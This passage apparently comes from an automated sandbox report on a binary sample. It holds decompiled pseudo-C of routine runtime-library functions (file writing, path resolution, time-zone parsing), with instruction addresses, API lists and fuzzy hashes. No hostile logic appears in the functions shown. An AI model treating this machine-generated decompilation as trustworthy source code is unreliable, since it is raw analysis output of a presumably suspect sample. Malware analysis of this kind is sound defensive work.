								_t58 =  *((intOrPtr*)( *( *(_t101 + 0x3c)) + 0x14))(_t101 + 0x50, _t105 - 0x2d, _t105 - 0x2c, _t105 - 0x38, _t93,  *((intOrPtr*)(_t105 - 0x18)) + _t53, _t105 - 0x34);
								__eflags = _t58;
								if(_t58 < 0) {
									break;
								}
								__eflags = _t58 - 1;
								if(_t58 > 1) {
									__eflags = _t58 - 3;
									if(__eflags != 0) {
										break;
									}
									_push( *(_t101 + 0x58));
									_push( *(_t105 - 0x2d));
									_t60 = E004228AF(0, _t93, _t98, _t101, __eflags);
									_t103 = _t101 | 0xffffffff;
									__eflags = _t60 - _t103;
									if(_t60 == _t103) {
										L28:
										E004019D5(_t105 - 0x2c, _t98, 1, 0);
										_t49 = _t103;
										goto L31;
									}
									L26:
									_t103 =  *(_t105 + 8);
									goto L28;
								}
								__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
								_t62 =  *((intOrPtr*)(_t105 - 0x28));
								if( *((intOrPtr*)(_t105 - 0x14)) < 0x10) {
									_t62 = _t105 - 0x28;
								}
								_t98 =  *((intOrPtr*)(_t105 - 0x34)) - _t62;
								__eflags = _t98;
								if(_t98 == 0) {
									L20:
									_t63 = _t105 - 0x2d;
									__eflags =  *((intOrPtr*)(_t105 - 0x38)) - _t105 - 0x2d;
									 *((char*)(_t101 + 0x4c)) = 1;
									if( *((intOrPtr*)(_t105 - 0x38)) != _t105 - 0x2d) {
										goto L26;
									}
									__eflags = _t98;
									if(_t98 == 0) {
										E00421152(_t63, _t105 - 0x2c, _t105, 8, 0);
									}
									continue;
								} else {
									__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
									_t65 =  *((intOrPtr*)(_t105 - 0x28));
									if(__eflags < 0) {
										_t65 = _t105 - 0x28;
									}
									_push( *(_t101 + 0x58));
									_push(_t98);
									_push(1);
									_push(_t65);
									_t66 = E00422863(0, _t93, _t98, _t101, __eflags);
									_t108 = _t108 + 0x10;
									__eflags = _t98 - _t66;
									if(_t98 != _t66) {
										_t103 = _t101 | 0xffffffff;
										__eflags = _t103;
										goto L28;
									} else {
										goto L20;
									}
								}
							}
							_t48 = E004019D5(_t105 - 0x2c, _t98, 1, 0);
							goto L30;
						}
						_push(_t48);
						_push(_t71); // executed
						_t48 = E004228AF(_t71, _t92, 0, _t101, __eflags); // executed
						__eflags = _t48 - 0xffffffff;
						if(_t48 == 0xffffffff) {
							goto L30;
						}
						L8:
						_t49 = _t71;
						goto L31;
					}
					_t68 =  *((intOrPtr*)(__ecx + 0x34));
					_t92 =  *_t68 + _t78;
					__eflags = _t78 -  *_t68 + _t78;
					if(_t78 >=  *_t68 + _t78) {
						goto L5;
					}
					 *_t68 =  *_t68 - 1;
					_t104 =  *(__ecx + 0x24);
					_t69 =  *_t104;
					 *_t104 =  &(_t69[0]);
					 *_t69 = _t71;
					goto L8;
				}
				_t49 = 0;
				goto L32;
			}






















                                                                              0x00421480
                                                                              0x00421485
                                                                              0x00421488
                                                                              0x0042148d
                                                                              0x0042148e
                                                                              0x00421494
                                                                              0x00421495
                                                                              0x00421498
                                                                              0x0042149a
                                                                              0x004214a6
                                                                              0x004214a8
                                                                              0x004214ab
                                                                              0x004214ad
                                                                              0x004214ca
                                                                              0x004214ca
                                                                              0x004214cd
                                                                              0x004214cf
                                                                              0x004215f1
                                                                              0x004215f1
                                                                              0x004215f1
                                                                              0x004215f4
                                                                              0x004215f5
                                                                              0x004215f9
                                                                              0x0042160a
                                                                              0x0042160a
                                                                              0x004214d5
                                                                              0x004214d8
                                                                              0x004214fc
                                                                              0x004214ff
                                                                              0x00421504
                                                                              0x0042150a
                                                                              0x0042150f
                                                                              0x00421512
                                                                              0x00421512
                                                                              0x00421516
                                                                              0x00421519
                                                                              0x004215ac
                                                                              0x0042151f
                                                                              0x0042151f
                                                                              0x00421522
                                                                              0x00421522
                                                                              0x00421527
                                                                              0x00421544
                                                                              0x00421549
                                                                              0x0042154b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421551
                                                                              0x00421554
                                                                              0x004215b4
                                                                              0x004215b7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004215bd
                                                                              0x004215c0
                                                                              0x004215c1
                                                                              0x004215c6
                                                                              0x004215c9
                                                                              0x004215cd
                                                                              0x004215d7
                                                                              0x004215dd
                                                                              0x004215e2
                                                                              0x00000000
                                                                              0x004215e2
                                                                              0x004215cf
                                                                              0x004215cf
                                                                              0x00000000
                                                                              0x004215cf
                                                                              0x00421556
                                                                              0x0042155a
                                                                              0x0042155d
                                                                              0x0042155f
                                                                              0x0042155f
                                                                              0x00421565
                                                                              0x00421565
                                                                              0x00421567
                                                                              0x00421588
                                                                              0x00421588
                                                                              0x0042158b
                                                                              0x0042158e
                                                                              0x00421592
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421594
                                                                              0x00421596
                                                                              0x004215a2
                                                                              0x004215a2
                                                                              0x00000000
                                                                              0x00421569
                                                                              0x00421569
                                                                              0x0042156d
                                                                              0x00421570
                                                                              0x00421572
                                                                              0x00421572
                                                                              0x00421575
                                                                              0x00421578
                                                                              0x00421579
                                                                              0x0042157b
                                                                              0x0042157c
                                                                              0x00421581
                                                                              0x00421584
                                                                              0x00421586
                                                                              0x004215d4
                                                                              0x004215d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421586
                                                                              0x00421567
                                                                              0x004215ec
                                                                              0x00000000
                                                                              0x004215ec
                                                                              0x004214da
                                                                              0x004214de
                                                                              0x004214df
                                                                              0x004214e4
                                                                              0x004214e9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004214ef
                                                                              0x004214ef
                                                                              0x00000000
                                                                              0x004214ef
                                                                              0x004214af
                                                                              0x004214b4
                                                                              0x004214b6
                                                                              0x004214b8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004214ba
                                                                              0x004214bc
                                                                              0x004214bf
                                                                              0x004214c4
                                                                              0x004214c6
                                                                              0x00000000
                                                                              0x004214c6
                                                                              0x0042149c
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: af64898f88f398f14b1ed2bb53a95b2f4c0c3f60e479224aab502ef89ca70ca9
                                                                              • Instruction ID: 97f1c94b0c9fadaae7ce148d88db5b0c1e12abbb407536b6122b4692d7e317a6
                                                                              • Opcode Fuzzy Hash: af64898f88f398f14b1ed2bb53a95b2f4c0c3f60e479224aab502ef89ca70ca9
                                                                              • Instruction Fuzzy Hash: 8351CA71B00114AFCB10DBA9D9809EEB7F4EF69314F94466BE112E32A0DB74E984CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E088, Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E0042E088(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E004128A0(E00430F7D, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x45a0d4; // 0x45a0d8
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x45a0d8;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E0042DDD3(0x45a0d8);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x45a0d4 = _t15; // executed
					}
					_t14 = E0042DB8C(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x45a0d4; // 0x45a0d8
				_t23 = E0042DC98(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x45a0d4; // 0x45a0d8
					_t23 = _t12;
					E0042DE78(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                              0x0042e08d
                                                                              0x0042e092
                                                                              0x0042e094
                                                                              0x0042e09a
                                                                              0x0042e09c
                                                                              0x0042e0a4
                                                                              0x0042e0ab
                                                                              0x0042e0ae
                                                                              0x0042e0b2
                                                                              0x0042e0b7
                                                                              0x0042e0bb
                                                                              0x0042e0bd
                                                                              0x0042e0bd
                                                                              0x0042e0c3
                                                                              0x0042e0c8
                                                                              0x0042e0c8
                                                                              0x0042e0cc
                                                                              0x0042e0d7
                                                                              0x0042e0db
                                                                              0x0042e0dd
                                                                              0x0042e0e0
                                                                              0x0042e0e6
                                                                              0x0042e0eb
                                                                              0x0042e0eb
                                                                              0x0042e0f7
                                                                              0x0042e0ff

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042E08D
                                                                                • Part of subcall function 0042DDD3: TlsAlloc.KERNEL32(?,0042E0B7,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0,00000000,?,00412EE2,00000000), ref: 0042DDF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocH_prolog
                                                                              • String ID:
                                                                              • API String ID: 3910492588-0
                                                                              • Opcode ID: b45dd2ead7d7e50ef2884d92576724ad332ed22d1080846af9fe7be61cebfab0
                                                                              • Instruction ID: 453f17a88eadcff191bb547c3fd0757b733a3289fb9cbaeafe14a1a449ff7bfd
                                                                              • Opcode Fuzzy Hash: b45dd2ead7d7e50ef2884d92576724ad332ed22d1080846af9fe7be61cebfab0
                                                                              • Instruction Fuzzy Hash: 2501A232710220ABCB249F16D81177D77B1EF94716F50463EE58297391DBBD8C11DB19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403BC6, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00403BC6(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t8;
				void* _t9;

				_t8 = __ecx;
				_t4 = E004020B1(_t8, _t9, _a4, E00411A30(_a4)); // executed
				return _t4;
			}






                                                                              0x00403bcb
                                                                              0x00403bda
                                                                              0x00403be0

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              • Opcode ID: 4607d5ae61d85e3c09a5cc5ba899dd2d3ef5bdc27ccf119b7b8a4d0e1504fd09
                                                                              • Instruction ID: db15178483983a70e089acf957d6c13790fe35df87173019290b46afbe551840
                                                                              • Opcode Fuzzy Hash: 4607d5ae61d85e3c09a5cc5ba899dd2d3ef5bdc27ccf119b7b8a4d0e1504fd09
                                                                              • Instruction Fuzzy Hash: 0FC08C320042202A8526321199058AFAE05CF802B0B00881FBD48012A089798CD1809A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 004290C4, Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004290C4(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E004128A0(E00430FA4, _t76);
				_t33 =  *0x457184; // 0xb7aa1229
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E00428A50();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E00429082(_t76, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E00401000( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E00412FBB(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                              0x004290c9
                                                                              0x004290d4
                                                                              0x004290dc
                                                                              0x004290df
                                                                              0x004290f3
                                                                              0x004290fd
                                                                              0x0042910e
                                                                              0x00429117
                                                                              0x0042911c
                                                                              0x00429126
                                                                              0x0042912e
                                                                              0x00429131
                                                                              0x00429141
                                                                              0x004291dc
                                                                              0x004291de
                                                                              0x00429147
                                                                              0x00429165
                                                                              0x00429172
                                                                              0x00429175
                                                                              0x00429175
                                                                              0x00429182
                                                                              0x00000000
                                                                              0x00429184
                                                                              0x0042918e
                                                                              0x00429197
                                                                              0x00000000
                                                                              0x00429199
                                                                              0x0042919a
                                                                              0x004291a6
                                                                              0x00000000
                                                                              0x004291c9
                                                                              0x004291d6
                                                                              0x00000000
                                                                              0x004291d6
                                                                              0x004291a6
                                                                              0x00429197
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429167
                                                                              0x00429165
                                                                              0x004291e5
                                                                              0x004291ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004290ff
                                                                              0x00429104
                                                                              0x00429110
                                                                              0x00429110
                                                                              0x00429110
                                                                              0x004291f1
                                                                              0x00429202

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004290C9
                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 004290F3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00429104
                                                                                • Part of subcall function 00429082: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004290A7
                                                                                • Part of subcall function 00429082: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 004290AE
                                                                              • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00429139
                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 0042915D
                                                                              • CharUpperA.USER32(?,?,?,?), ref: 00429175
                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 0042918E
                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0042919A
                                                                              • lstrlenA.KERNEL32(?,?,?,?), ref: 004291B7
                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 004291D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                              • String ID:
                                                                              • API String ID: 4080879615-0
                                                                              • Opcode ID: 8fb7b7f9e86ea6e332f039f5fd3a7c646a8988f1a612b003eeb02b703282e1fe
                                                                              • Instruction ID: a026a971bacd424190f1abe37174b9483bebdb546824d758e64a9196714d402d
                                                                              • Opcode Fuzzy Hash: 8fb7b7f9e86ea6e332f039f5fd3a7c646a8988f1a612b003eeb02b703282e1fe
                                                                              • Instruction Fuzzy Hash: EE31AE31A00129EFDB109F65ED88AEF7BBCEF44355F4041AAF909D6211C7788E908A58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A554, Relevance: 12.2, APIs: 8, Instructions: 212timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0041A554(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				void* _t51;
				int _t52;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x44cc10);
				E00412BA4(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E004148F8(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x45a740; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x45a824 = 0;
				 *0x45794c =  *0x45794c | 0xffffffff;
				 *0x457940 =  *0x457940 | 0xffffffff;
				_t87 = E0041D839("TZ");
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x45a828; // 0x0
					__eflags = _t21;
					if(_t21 != 0) {
						_push(_t21);
						E00412A4D();
						 *0x45a828 = 0;
					}
					_t22 = GetTimeZoneInformation(0x45a778);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x45a824 = 1;
						_t26 = 0x45a778->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x4578a8 = _t27;
						__eflags =  *0x45a7be; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x45a7cc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x4578a8 = _t39;
						}
						__eflags =  *0x45a812; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x4578ac = 0;
							 *0x4578b0 = 0;
							goto L23;
						} else {
							_t36 =  *0x45a820; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x4578ac = 1;
							 *0x4578b0 = (_t36 -  *0x45a7cc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x45a77c, 0xffffffff,  *0x457938, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x457938; // 0x4578b8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x45a7d0, 0xffffffff,  *0x45793c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x45793c; // 0x4578f8
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x45793c; // 0x4578f8
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x457938; // 0x4578b8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x45a828; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E00412247(E00411A30(_t87) + 1);
						 *0x45a828 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E004127F2(_t90 - 0x10, 0xffffffff);
							L47:
							return E00412BDF(_t24);
						}
						E00419460(_t44, _t87);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E0041A76F();
						E0041ADB0( *0x457938, _t87, 3);
						_t48 =  *0x457938; // 0x4578b8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						 *0x4578a8 = E00413BE0(_t89) * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x4578a8 =  ~( *0x4578a8);
							}
							_t52 =  *_t89;
							 *0x4578ac = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x45793c; // 0x4578f8
								 *_t24 = 0;
							} else {
								E0041ADB0( *0x45793c, _t89, 3);
								_t24 =  *0x45793c; // 0x4578f8
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						 *0x4578a8 =  *0x4578a8 + E00413BE0(_t89) * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x4578a8 =  *0x4578a8 + E00413BE0(_t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E00416EE0(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x45a828; // 0x0
						if(_t60 != 0) {
							_push(_t60);
							E00412A4D();
						}
						goto L6;
					}
				}
			}





























                                                                              0x0041a554
                                                                              0x0041a556
                                                                              0x0041a55b
                                                                              0x0041a562
                                                                              0x0041a567
                                                                              0x0041a56d
                                                                              0x0041a570
                                                                              0x0041a576
                                                                              0x0041a579
                                                                              0x0041a57f
                                                                              0x0041a586
                                                                              0x0041a598
                                                                              0x0041a59a
                                                                              0x0041a59f
                                                                              0x0041a65d
                                                                              0x0041a662
                                                                              0x0041a664
                                                                              0x0041a666
                                                                              0x0041a667
                                                                              0x0041a66d
                                                                              0x0041a66d
                                                                              0x0041a678
                                                                              0x0041a67e
                                                                              0x0041a681
                                                                              0x00000000
                                                                              0x0041a687
                                                                              0x0041a68a
                                                                              0x0041a690
                                                                              0x0041a695
                                                                              0x0041a698
                                                                              0x0041a69d
                                                                              0x0041a6a4
                                                                              0x0041a6a6
                                                                              0x0041a6af
                                                                              0x0041a6af
                                                                              0x0041a6b1
                                                                              0x0041a6b1
                                                                              0x0041a6b6
                                                                              0x0041a6bd
                                                                              0x0041a6de
                                                                              0x0041a6de
                                                                              0x0041a6e4
                                                                              0x00000000
                                                                              0x0041a6bf
                                                                              0x0041a6bf
                                                                              0x0041a6c4
                                                                              0x0041a6c6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a6c8
                                                                              0x0041a6d7
                                                                              0x0041a6ea
                                                                              0x0041a706
                                                                              0x0041a708
                                                                              0x0041a70a
                                                                              0x0041a71c
                                                                              0x0041a71c
                                                                              0x0041a721
                                                                              0x0041a724
                                                                              0x0041a73a
                                                                              0x0041a73c
                                                                              0x0041a73e
                                                                              0x0041a750
                                                                              0x0041a750
                                                                              0x0041a755
                                                                              0x00000000
                                                                              0x0041a755
                                                                              0x0041a740
                                                                              0x0041a743
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a745
                                                                              0x0041a74a
                                                                              0x00000000
                                                                              0x0041a74a
                                                                              0x0041a70c
                                                                              0x0041a70f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a711
                                                                              0x0041a716
                                                                              0x00000000
                                                                              0x0041a716
                                                                              0x0041a6bd
                                                                              0x0041a5ae
                                                                              0x0041a5ae
                                                                              0x0041a5b5
                                                                              0x0041a5d8
                                                                              0x0041a5e0
                                                                              0x0041a5e7
                                                                              0x0041a5ee
                                                                              0x0041a758
                                                                              0x0041a75e
                                                                              0x0041a7f6
                                                                              0x0041a7fb
                                                                              0x0041a7fb
                                                                              0x0041a5f6
                                                                              0x0041a5fd
                                                                              0x0041a601
                                                                              0x0041a60f
                                                                              0x0041a617
                                                                              0x0041a61c
                                                                              0x0041a620
                                                                              0x0041a626
                                                                              0x0041a628
                                                                              0x0041a62f
                                                                              0x0041a62f
                                                                              0x0041a63d
                                                                              0x0041a644
                                                                              0x0041a644
                                                                              0x0041a648
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a65a
                                                                              0x0041a65a
                                                                              0x0041a778
                                                                              0x0041a77b
                                                                              0x0041a7bb
                                                                              0x0041a7bb
                                                                              0x0041a7be
                                                                              0x0041a7c0
                                                                              0x0041a7c0
                                                                              0x0041a7c6
                                                                              0x0041a7c9
                                                                              0x0041a7ce
                                                                              0x0041a7d0
                                                                              0x0041a7ee
                                                                              0x0041a7f3
                                                                              0x0041a7d2
                                                                              0x0041a7db
                                                                              0x0041a7e3
                                                                              0x0041a7e8
                                                                              0x0041a7e8
                                                                              0x00000000
                                                                              0x0041a7d0
                                                                              0x0041a77d
                                                                              0x0041a788
                                                                              0x0041a795
                                                                              0x0041a795
                                                                              0x0041a797
                                                                              0x0041a799
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a790
                                                                              0x0041a792
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a794
                                                                              0x0041a794
                                                                              0x0041a794
                                                                              0x0041a79b
                                                                              0x0041a79e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7a0
                                                                              0x0041a7a8
                                                                              0x0041a7b5
                                                                              0x0041a7b5
                                                                              0x0041a7b7
                                                                              0x0041a7b9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7b0
                                                                              0x0041a7b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7b4
                                                                              0x0041a7b4
                                                                              0x0041a7b4
                                                                              0x00000000
                                                                              0x0041a7b5
                                                                              0x0041a5c2
                                                                              0x00000000
                                                                              0x0041a5c8
                                                                              0x0041a5c8
                                                                              0x0041a5cf
                                                                              0x0041a5d1
                                                                              0x0041a5d2
                                                                              0x0041a5d7
                                                                              0x00000000
                                                                              0x0041a5cf
                                                                              0x0041a5c2

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041A567
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • _strlen.LIBCMT ref: 0041A5D9
